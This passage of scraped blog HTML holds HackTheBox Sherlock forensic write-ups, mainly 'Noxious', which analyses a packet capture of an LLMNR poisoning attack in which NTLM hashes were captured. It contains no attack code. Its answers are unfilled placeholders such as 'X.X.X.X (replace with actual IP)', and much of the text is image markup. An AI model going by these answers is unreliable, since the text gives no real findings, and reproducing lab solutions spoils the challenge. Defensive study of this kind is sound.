https://substackcdn.com/image/fetch/$s_!wqjx!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wqjx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png" width="1338" height="521" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:521,&quot;width&quot;:1338,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:117387,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wqjx!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 424w, https://substackcdn.com/image/fetch/$s_!wqjx!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 848w, https://substackcdn.com/image/fetch/$s_!wqjx!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 1272w, https://substackcdn.com/image/fetch/$s_!wqjx!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8a86ec7-9e9a-4855-acb7-ede6f59c5bda_1338x521.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>8. What is the name of the technique relevant to the binary the attacker runs?</strong></p><p>We need to investigate the binary that the attacker executed. By examining the binary's attributes and behavior, we can determine the specific technique employed by the attacker related to the execution of the binary.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Mdba!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Mdba!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 424w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 848w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 1272w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Mdba!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png" width="1456" height="562" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:562,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:123087,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Mdba!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 424w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 848w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 1272w, https://substackcdn.com/image/fetch/$s_!Mdba!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff9aa7d89-07ce-4b7a-82d6-9c54c02f418c_1915x739.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p>This write-up outlines the steps necessary to analyze and confirm the details of the compromise. By following the steps above, we can systematically answer each question and determine how the host was compromised.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Noxious]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-noxious</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-noxious</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Sat, 04 Jan 2025 00:00:44 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!fTH2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Scenario</strong></p><p>The Intrusion Detection System (IDS) identified unusual activity in the internal Active Directory network involving LLMNR traffic, indicating a possible LLMNR poisoning attack. The investigation focuses on the suspect device targeting Forela-WKstn002 (IP: 172.17.79.136). A packet capture (PCAP) was provided for analysis. Below are the findings from the network forensics investigation.</p><p><strong>1. It's suspected by the security team that there was a rogue device in Forela's internal network running a responder tool to perform an LLMNR Poisoning attack. Please find the malicious IP Address of the machine.</strong></p><p><strong>Approach:</strong></p><ul><li><p>Open the PCAP file using Wireshark or NetworkMiner.</p></li><li><p>Apply the filter for port 5355 (LLMNR) to isolate relevant traffic.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The malicious IP address is X.X.X.X (replace with actual IP after analysis).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fTH2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fTH2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 424w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 848w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 1272w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fTH2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png" width="1456" height="440" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:440,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fTH2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 424w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 848w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 1272w, https://substackcdn.com/image/fetch/$s_!fTH2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed4cef04-7652-4331-b0cf-40f56f93238f_2035x615.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2. What is the hostname of the rogue machine?</strong></p><p><strong>Approach:</strong></p><ul><li><p>In NetworkMiner, navigate to the "Hosts" tab.</p></li><li><p>Filter based on the IP address found in question 1.</p></li><li><p>Review the hostnames and identify the consistent hostname amidst multiple poisoned entries.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The hostname of the rogue machine is attacker-hostname (replace with actual hostname).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kMAH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kMAH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 424w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 848w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 1272w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kMAH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png" width="899" height="506" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:506,&quot;width&quot;:899,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kMAH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 424w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 848w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 1272w, https://substackcdn.com/image/fetch/$s_!kMAH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdc52fbdf-0e8b-4019-bd85-7844098c2ba3_899x506.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. Now we need to confirm whether the attacker captured the user's hash and it is crackable!! What is the username whose hash was captured?</strong></p><p><strong>Approach:</strong></p><ul><li><p>In NetworkMiner, go to the "Credentials" tab.</p></li><li><p>Review the captured credentials to identify the username.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The username whose hash was captured is victim-username (replace with actual username).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xbBs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xbBs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 424w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 848w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 1272w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xbBs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png" width="1332" height="632" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:632,&quot;width&quot;:1332,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xbBs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 424w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 848w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 1272w, https://substackcdn.com/image/fetch/$s_!xbBs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4fad95f-f5f6-4735-b4c0-b02d76a44230_1332x632.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. In NTLM traffic, we can see that the victim credentials were relayed multiple times to the attacker's machine. When were the hashes captured the first time?</strong></p><p><strong>Approach:</strong></p><ul><li><p>Continue using the credentials view and inspect timestamps.</p></li><li><p>Identify the earliest occurrence of captured hashes.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The first time the hash was captured: HH:MM:SS (replace with actual time).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TUoc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TUoc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 424w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 848w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 1272w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TUoc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png" width="1063" height="259" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:259,&quot;width&quot;:1063,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 